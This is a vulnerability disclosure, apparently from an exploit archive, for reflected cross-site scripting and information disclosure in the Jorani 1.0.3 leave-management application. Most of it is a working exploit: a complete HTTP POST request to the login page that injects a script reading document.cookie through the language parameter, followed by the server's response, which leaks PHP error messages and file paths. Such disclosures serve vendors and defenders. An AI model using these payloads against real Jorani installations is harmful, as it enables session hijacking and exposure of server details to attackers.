Jorani 1.0.3 Cross Site Scripting

## Title: Jorani-v1.0.3-©2014-2023-Benjamin-BALET-XSS-Reflected-Information-Disclosure## Author: nu11secur1ty## Date: 08/27/2023## Vendor: https://jorani.org/## Software: https://demo.jorani.org/session/login## Reference: https://portswigger.net/web-security/cross-site-scripting## Reference: https://portswigger.net/web-security/information-disclosure## Description:The value of the `language request` parameter is copied into aJavaScript string which is encapsulated in double quotation marks. Thepayload 75943";alert(1)//569 was submitted in the language parameter.This input was echoed unmodified in the application's response.The attacker can modify the token session and he can discoversensitive information for the server.STATUS: HIGH-Vulnerability[+]Exploit:```POSTPOST /session/login HTTP/1.1Host: demo.jorani.orgAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111Safari/537.36Connection: closeCache-Control: max-age=0Cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2;jorani_session=fbc630d2510ffdd2a981ccfe97301b1b90ab47dc#ATTACKOrigin: http://demo.jorani.orgUpgrade-Insecure-Requests: 1Referer: http://demo.jorani.org/session/loginContent-Type: application/x-www-form-urlencodedSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 183csrf_test_jorani=9b4b02ece59e0f321cd0324a633b5dd2&last_page=session%2Flogin&language=en-GBarh5l%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ennois&login=bbalet&CipheredValue=```[+]Response:```HTTPHTTP/1.1 200 OKdate: Sun, 27 Aug 2023 06:03:04 GMTcontent-type: text/html; charset=UTF-8Content-Length: 681server: Apachex-powered-by: PHP/8.2expires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheset-cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2;expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/;SameSite=Strictset-cookie: jorani_session=9ae823ffa74d722c809f6bda69954593483f2cfd;expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/; HttpOnly;SameSite=Laxlast-modified: Sun, 27 Aug 2023 06:03:04 GMTvary: Accept-Encodingcache-control: private, no-cache, no-store, proxy-revalidate,no-transform, must-revalidatepragma: no-cachex-iplb-request-id: 3E497A1D:118A_D5BA2118:0050_64EAE718_12C0:1FBA1x-iplb-instance: 27474connection: close<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;"><h4>A PHP Error was encountered</h4><p>Severity: 8192</p><p>Message:  strlen(): Passing null to parameter #1 ($string) of typestring is deprecated</p><p>Filename: controllers/Connection.php</p><p>Line Number: 126</p></div><div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;"><h4>A PHP Error was encountered</h4><p>Severity: Warning</p><p>Message:  Cannot modify header information - headers already sentby (output started at/home/decouvric/demo.jorani.org/system/core/Exceptions.php:272)</p><p>Filename: helpers/url_helper.php</p><p>Line Number: 565</p></div>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Jorani/2023/Jorani-v1.0.3-%C2%A92014-2023-Benjamin-BALET-XSS-Reflected-Information-Disclosure)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/jorani-v103-2014-2023-benjamin-balet.html)## Time spend:01:35:00